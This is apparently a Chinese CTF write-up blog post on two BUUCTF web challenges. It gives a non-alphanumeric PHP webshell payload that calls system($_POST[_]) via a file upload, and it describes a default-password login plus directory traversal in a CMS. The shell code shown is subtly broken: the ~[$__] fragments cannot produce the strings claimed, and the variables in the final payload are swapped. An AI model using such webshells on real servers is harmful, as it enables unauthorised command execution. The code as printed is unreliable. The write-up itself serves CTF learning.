buu web部分wp

[SUCTF 2018]GetShell

打开题目,要进行getshell
在这里插入图片描述
上传文件,然后截取内容,从第六位开始的内容都会赋给data,然后会有一个黑名单一样的东西,如果data中存在黑名单字符,就会die。
fuzz之后,数字及英文字母都被过滤了
查看资料:一些不包含数字和字母的webshell
发现需要使用文章中第二种的方式
在这里插入图片描述
没有过滤的字符有$ ( ) [ ] _ ~ ;

<?php
$_=[]; //
$__=$_.$_; //arrayarray
$_=($_==$__);//$_=(array==arrayarray)明显不相同 false 0
$__=($_==$_);//$__=(array==array) 相同返回1

$___ = ~[$__].~[$__].~[$__].~[$__].~[$__].~[$__];//system
$____ = ~[$__].~[$__].~[$__].~[$__].~[$__];//_POST


$____($$__[_]);//也就是system($_POST[_])

payload:

<?=$_=[];$__=$_.$_;$_=($_==$__);$__=($_==$_);$___=~[$__].~[$__].~[$__].~[$__].~[$__].~[$__];$____=~[$__].~[$__].~[$__].~[$__].~[$__];$___($$____[_]);

直接上传一个php文件
在这里插入图片描述

没得到flag,查看其它wp知道环境有点问题,flag不在这里,但是可以使用env来得到flag
在这里插入图片描述

[GKCTF 2021]easycms

提示:在这里插入图片描述
进入admin.php页面,使用admin 12345成功登录,发现可以进行网页编辑,但是需要权限
在这里插入图片描述
在微信这里存在目录穿越
在这里插入图片描述
随便上传一张图片
在这里插入图片描述

回到编辑页面
在这里插入图片描述
编辑代码,拿到flag
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值